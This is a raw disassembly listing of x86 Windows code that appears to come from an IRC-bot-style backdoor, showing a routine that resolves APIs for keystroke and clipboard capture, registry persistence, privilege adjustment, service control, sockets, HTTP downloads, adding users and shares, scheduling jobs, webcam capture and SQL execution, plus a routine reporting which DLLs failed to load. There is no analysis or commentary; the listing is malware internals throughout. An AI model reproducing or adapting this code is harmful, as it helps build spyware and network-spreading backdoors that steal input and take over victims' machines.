push edi
mov dword_43A418, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_43A344, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_43A3B4, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_43A35C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_43A4F4, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_43A340, eax
call esi ; GetProcAddress
cmp dword_43A484, ebx
mov dword_43A45C, eax
jz short loc_406405
cmp dword_43A418, ebx
jz short loc_406405
cmp dword_43A344, ebx
jz short loc_406405
cmp dword_43A3B4, ebx
jz short loc_406405
cmp dword_43A35C, ebx
jz short loc_406405
cmp dword_43A4F4, ebx
jz short loc_406405
cmp dword_43A340, ebx
jz short loc_406405
cmp eax, ebx
jnz short loc_40640F
loc_406405: ; CODE XREF: sub_406217+1B8�j
; sub_406217+1C0�j ...
mov dword_43A520, 1
loc_40640F: ; CODE XREF: sub_406217+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_43A360, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_43A4E4, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_43A370, eax
call esi ; GetProcAddress
cmp dword_43A360, ebx
mov dword_43A380, eax
jz short loc_40646C
cmp dword_43A4E4, ebx
jz short loc_40646C
cmp dword_43A370, ebx
jz short loc_40646C
cmp eax, ebx
jnz short loc_406476
jmp short loc_40646C
; ---------------------------------------------------------------------------
loc_406461: ; CODE XREF: sub_406217+144�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A524, eax
loc_40646C: ; CODE XREF: sub_406217+232�j
; sub_406217+23A�j ...
mov dword_43A520, 1
loc_406476: ; CODE XREF: sub_406217+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_406611
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_43A4F0, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_43A408, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_43A3A0, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_43A378, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_43A3FC, eax
call esi ; GetProcAddress
cmp dword_43A4F0, ebx
mov dword_43A4A0, eax
jz short loc_406501
cmp dword_43A408, ebx
jz short loc_406501
cmp dword_43A3A0, ebx
jz short loc_406501
cmp dword_43A378, ebx
jz short loc_406501
cmp dword_43A3FC, ebx
jz short loc_406501
cmp eax, ebx
jnz short loc_40650B
loc_406501: ; CODE XREF: sub_406217+2C4�j
; sub_406217+2CC�j ...
mov dword_43A528, 1
loc_40650B: ; CODE XREF: sub_406217+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_43A4FC, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_43A4E0, eax
call esi ; GetProcAddress
cmp dword_43A4FC, ebx
mov dword_43A428, eax
jz short loc_406546
cmp dword_43A4E0, ebx
jz short loc_406546
cmp eax, ebx
jnz short loc_406550
loc_406546: ; CODE XREF: sub_406217+321�j
; sub_406217+329�j
mov dword_43A528, 1
loc_406550: ; CODE XREF: sub_406217+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_43A480, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_43A500, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_43A488, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_43A4A4, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_43A3B0, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_43A3EC, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_43A490, eax
call esi ; GetProcAddress
cmp dword_43A480, ebx
mov dword_43A4BC, eax
jz short loc_4065F4
cmp dword_43A500, ebx
jz short loc_4065F4
cmp dword_43A488, ebx
jz short loc_4065F4
cmp dword_43A4A4, ebx
jz short loc_4065F4
cmp dword_43A3B0, ebx
jz short loc_4065F4
cmp dword_43A3EC, ebx
jz short loc_4065F4
cmp dword_43A490, ebx
jz short loc_4065F4
cmp eax, ebx
jnz short loc_4065FE
loc_4065F4: ; CODE XREF: sub_406217+3A7�j
; sub_406217+3AF�j ...
mov dword_43A528, 1
loc_4065FE: ; CODE XREF: sub_406217+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43A450, eax
jnz short loc_406626
jmp short loc_40661C
; ---------------------------------------------------------------------------
loc_406611: ; CODE XREF: sub_406217+26A�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A52C, eax
loc_40661C: ; CODE XREF: sub_406217+3F8�j
mov dword_43A528, 1
loc_406626: ; CODE XREF: sub_406217+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4066F2
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_43A504, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_43A4D4, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_43A438, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_43A430, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_43A478, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_43A34C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_43A448, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_43A3E8, eax
call esi ; GetProcAddress
cmp dword_43A504, ebx
mov dword_43A43C, eax
jz short loc_4066FD
cmp dword_43A4D4, ebx
jz short loc_4066FD
cmp dword_43A438, ebx
jz short loc_4066FD
cmp dword_43A430, ebx
jz short loc_4066FD
cmp dword_43A478, ebx
jz short loc_4066FD
cmp dword_43A34C, ebx
jz short loc_4066FD
cmp dword_43A448, ebx
jz short loc_4066FD
cmp dword_43A3E8, ebx
jz short loc_4066FD
cmp eax, ebx
jnz short loc_406707
jmp short loc_4066FD
; ---------------------------------------------------------------------------
loc_4066F2: ; CODE XREF: sub_406217+41A�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A534, eax
loc_4066FD: ; CODE XREF: sub_406217+49B�j
; sub_406217+4A3�j ...
mov dword_43A530, 1
loc_406707: ; CODE XREF: sub_406217+4D7�j
mov ebp, dword_422088
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4069C3
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_43A3CC, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_43A334, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_43A44C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_43A414, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_43A498, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_43A47C, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_43A4DC, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_43A3BC, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_43A354, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_43A36C, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_43A440, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_43A434, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_43A514, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_43A4EC, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_43A4B8, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_43A494, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_43A458, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_43A38C, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_43A324, eax
call esi ; GetProcAddress
mov dword_43A348, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_43A49C, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_43A468, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_43A4E8, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_43A37C, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_43A3D8, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_43A328, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_43A4D8, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_43A420, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_43A4B4, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_43A400, eax
call esi ; GetProcAddress
cmp dword_43A3CC, ebx
mov dword_43A4D0, eax
jz loc_4069CE
cmp dword_43A334, ebx
jz loc_4069CE
cmp dword_43A44C, ebx
jz loc_4069CE
cmp dword_43A498, ebx
jz loc_4069CE
cmp dword_43A47C, ebx
jz loc_4069CE
cmp dword_43A4DC, ebx
jz loc_4069CE
cmp dword_43A3BC, ebx
jz loc_4069CE
cmp dword_43A354, ebx
jz loc_4069CE
cmp dword_43A36C, ebx
jz loc_4069CE
cmp dword_43A440, ebx
jz loc_4069CE
cmp dword_43A434, ebx
jz loc_4069CE
cmp dword_43A514, ebx
jz loc_4069CE
cmp dword_43A4EC, ebx
jz loc_4069CE
cmp dword_43A4B8, ebx
jz short loc_4069CE
cmp dword_43A458, ebx
jz short loc_4069CE
cmp dword_43A38C, ebx
jz short loc_4069CE
cmp dword_43A324, ebx
jz short loc_4069CE
cmp dword_43A348, ebx
jz short loc_4069CE
cmp dword_43A49C, ebx
jz short loc_4069CE
cmp dword_43A468, ebx
jz short loc_4069CE
cmp dword_43A4E8, ebx
jz short loc_4069CE
cmp dword_43A37C, ebx
jz short loc_4069CE
cmp dword_43A3D8, ebx
jz short loc_4069CE
cmp dword_43A328, ebx
jz short loc_4069CE
cmp dword_43A4D8, ebx
jz short loc_4069CE
cmp dword_43A420, ebx
jz short loc_4069CE
cmp dword_43A4B4, ebx
jz short loc_4069CE
cmp eax, ebx
jnz short loc_4069D8
jmp short loc_4069CE
; ---------------------------------------------------------------------------
loc_4069C3: ; CODE XREF: sub_406217+501�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A53C, eax
loc_4069CE: ; CODE XREF: sub_406217+6A0�j
; sub_406217+6AC�j ...
mov dword_43A538, 1
loc_4069D8: ; CODE XREF: sub_406217+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406ADD
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_43A338, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_43A510, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_43A3E4, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_43A50C, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_43A3F4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_43A358, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_43A3C4, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_43A330, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_43A470, eax
call esi ; GetProcAddress
cmp dword_43A338, ebx
mov ecx, dword_43A358
mov dword_43A41C, eax
jz short loc_406AB9
cmp dword_43A510, ebx
jz short loc_406AB9
cmp dword_43A3E4, ebx
jz short loc_406AB9
cmp dword_43A50C, ebx
jz short loc_406AB9
cmp dword_43A3F4, ebx
jz short loc_406AB9
cmp ecx, ebx
jz short loc_406AB9
cmp dword_43A3C4, ebx
jz short loc_406AB9
cmp dword_43A330, ebx
jz short loc_406AB9
cmp dword_43A470, ebx
jz short loc_406AB9
cmp eax, ebx
jnz short loc_406AC3
loc_406AB9: ; CODE XREF: sub_406217+860�j
; sub_406217+868�j ...
mov dword_43A540, 1
loc_406AC3: ; CODE XREF: sub_406217+8A0�j
cmp ecx, ebx
jz short loc_406AF8
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_43A508, eax
jnz short loc_406AF8
jmp short loc_406AF2
; ---------------------------------------------------------------------------
loc_406ADD: ; CODE XREF: sub_406217+7CC�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A544, eax
mov dword_43A540, 1
loc_406AF2: ; CODE XREF: sub_406217+8C4�j
mov dword_43A508, ebx
loc_406AF8: ; CODE XREF: sub_406217+8AE�j
; sub_406217+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406B42
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_43A410, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_43A444, eax
call esi ; GetProcAddress
cmp dword_43A410, ebx
mov dword_43A4AC, eax
jz short loc_406B4D
cmp dword_43A444, ebx
jz short loc_406B4D
cmp eax, ebx
jnz short loc_406B57
jmp short loc_406B4D
; ---------------------------------------------------------------------------
loc_406B42: ; CODE XREF: sub_406217+8EC�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A54C, eax
loc_406B4D: ; CODE XREF: sub_406217+91B�j
; sub_406217+923�j ...
mov dword_43A548, 1
loc_406B57: ; CODE XREF: sub_406217+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406C4D
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_43A3A4, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_43A3C0, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_43A4C4, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_43A368, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_43A3F8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_43A32C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_43A388, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_43A48C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_43A39C, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_43A3A8, eax
call esi ; GetProcAddress
cmp dword_43A3A4, ebx
mov dword_43A3D0, eax
jz short loc_406C58
cmp dword_43A3C0, ebx
jz short loc_406C58
cmp dword_43A4C4, ebx
jz short loc_406C58
cmp dword_43A368, ebx
jz short loc_406C58
cmp dword_43A3F8, ebx
jz short loc_406C58
cmp dword_43A32C, ebx
jz short loc_406C58
cmp dword_43A388, ebx
jz short loc_406C58
cmp dword_43A48C, ebx
jz short loc_406C58
cmp dword_43A39C, ebx
jz short loc_406C58
cmp dword_43A3A8, ebx
jz short loc_406C58
cmp eax, ebx
jnz short loc_406C62
jmp short loc_406C58
; ---------------------------------------------------------------------------
loc_406C4D: ; CODE XREF: sub_406217+94B�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A554, eax
loc_406C58: ; CODE XREF: sub_406217+9E6�j
; sub_406217+9EE�j ...
mov dword_43A550, 1
loc_406C62: ; CODE XREF: sub_406217+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406C97
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_43A4A8, eax
call esi ; GetProcAddress
cmp dword_43A4A8, ebx
mov dword_43A424, eax
jz short loc_406CA2
cmp eax, ebx
jnz short loc_406CAC
jmp short loc_406CA2
; ---------------------------------------------------------------------------
loc_406C97: ; CODE XREF: sub_406217+A56�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A55C, eax
loc_406CA2: ; CODE XREF: sub_406217+A78�j
; sub_406217+A7E�j
mov dword_43A558, 1
loc_406CAC: ; CODE XREF: sub_406217+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406CE1
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_43A3C8, eax
call esi ; GetProcAddress
cmp dword_43A3C8, ebx
mov dword_43A42C, eax
jz short loc_406CEC
cmp eax, ebx
jnz short loc_406CF6
jmp short loc_406CEC
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406217+AA0�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A564, eax
loc_406CEC: ; CODE XREF: sub_406217+AC2�j
; sub_406217+AC8�j
mov dword_43A560, 1
loc_406CF6: ; CODE XREF: sub_406217+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406D55
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_43A464, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_43A4F8, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_43A398, eax
call esi ; GetProcAddress
cmp dword_43A464, ebx
mov dword_43A350, eax
jz short loc_406D60
cmp dword_43A4F8, ebx
jz short loc_406D60
cmp dword_43A398, ebx
jz short loc_406D60
cmp eax, ebx
jnz short loc_406D6A
jmp short loc_406D60
; ---------------------------------------------------------------------------
loc_406D55: ; CODE XREF: sub_406217+AEA�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A56C, eax
loc_406D60: ; CODE XREF: sub_406217+B26�j
; sub_406217+B2E�j ...
mov dword_43A568, 1
loc_406D6A: ; CODE XREF: sub_406217+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406D9F
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_43A4CC, eax
call esi ; GetProcAddress
cmp dword_43A4CC, ebx
mov dword_43A390, eax
jz short loc_406DAA
cmp eax, ebx
jnz short loc_406DB4
jmp short loc_406DAA
; ---------------------------------------------------------------------------
loc_406D9F: ; CODE XREF: sub_406217+B5E�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A574, eax
loc_406DAA: ; CODE XREF: sub_406217+B80�j
; sub_406217+B86�j
mov dword_43A570, 1
loc_406DB4: ; CODE XREF: sub_406217+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406E3D
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_43A4B0, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_43A374, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_43A4C8, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_43A3E0, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_43A474, eax
call esi ; GetProcAddress
cmp dword_43A4B0, ebx
mov dword_43A384, eax
jz short loc_406E48
cmp dword_43A374, ebx
jz short loc_406E48
cmp dword_43A4C8, ebx
jz short loc_406E48
cmp dword_43A3E0, ebx
jz short loc_406E48
cmp dword_43A474, ebx
jz short loc_406E48
cmp eax, ebx
jnz short loc_406E52
jmp short loc_406E48
; ---------------------------------------------------------------------------
loc_406E3D: ; CODE XREF: sub_406217+BA8�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A57C, eax
loc_406E48: ; CODE XREF: sub_406217+BFE�j
; sub_406217+C06�j ...
mov dword_43A578, 1
loc_406E52: ; CODE XREF: sub_406217+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406E87
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_43A3F0, eax
call esi ; GetProcAddress
cmp dword_43A3F0, ebx
mov dword_43A454, eax
jz short loc_406E92
cmp eax, ebx
jnz short loc_406E9C
jmp short loc_406E92
; ---------------------------------------------------------------------------
loc_406E87: ; CODE XREF: sub_406217+C46�j
call dword_422008 ; RtlGetLastWin32Error
mov dword_43A584, eax
loc_406E92: ; CODE XREF: sub_406217+C68�j
; sub_406217+C6E�j
mov dword_43A580, 1
loc_406E9C: ; CODE XREF: sub_406217+C6C�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_406217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EA4 proc near ; CODE XREF: sub_409848+4CB2�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_43A518, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_406EEC
push dword_43A51C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_406EEC: ; CODE XREF: sub_406EA4+1A�j
cmp dword_43A520, esi
jz short loc_406F20
push dword_43A524
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_406F20: ; CODE XREF: sub_406EA4+4E�j
cmp dword_43A528, esi
jz short loc_406F54
push dword_43A52C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_406F54: ; CODE XREF: sub_406EA4+82�j
cmp dword_43A530, esi
jz short loc_406F88
push dword_43A534
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_406F88: ; CODE XREF: sub_406EA4+B6�j
cmp dword_43A538, esi
jz short loc_406FBC
push dword_43A53C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_406FBC: ; CODE XREF: sub_406EA4+EA�j
cmp dword_43A540, esi
jz short loc_406FF0
push dword_43A544
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_406FF0: ; CODE XREF: sub_406EA4+11E�j
cmp dword_43A548, esi
jz short loc_407024
push dword_43A54C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_407024: ; CODE XREF: sub_406EA4+152�j
cmp dword_43A550, esi
jz short loc_407058
push dword_43A554
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_407058: ; CODE XREF: sub_406EA4+186�j
cmp dword_43A558, esi
jz short loc_40708C
push dword_43A55C
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
loc_407079: ; DATA XREF: .text:00431824�o
; .text:00431838�o ...
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_40708C: ; CODE XREF: sub_406EA4+1BA�j
cmp dword_43A560, esi
jz short loc_4070C0
push dword_43A564
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_4070C0: ; CODE XREF: sub_406EA4+1EE�j
cmp dword_43A568, esi
jz short loc_4070F4
push dword_43A56C
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_4070F4: ; CODE XREF: sub_406EA4+222�j
cmp dword_43A570, esi
jz short loc_407128
push dword_43A574
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_407128: ; CODE XREF: sub_406EA4+256�j
cmp dword_43A578, esi
jz short loc_40715C
push dword_43A57C
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_40715C: ; CODE XREF: sub_406EA4+28A�j
cmp dword_43A580, esi
jz short loc_407190
push dword_43A584
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_416975
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D62
add esp, 20h
loc_407190: ; CODE XREF: sub_406EA4+2BE�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_416975
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_4071BD
push esi
push edi
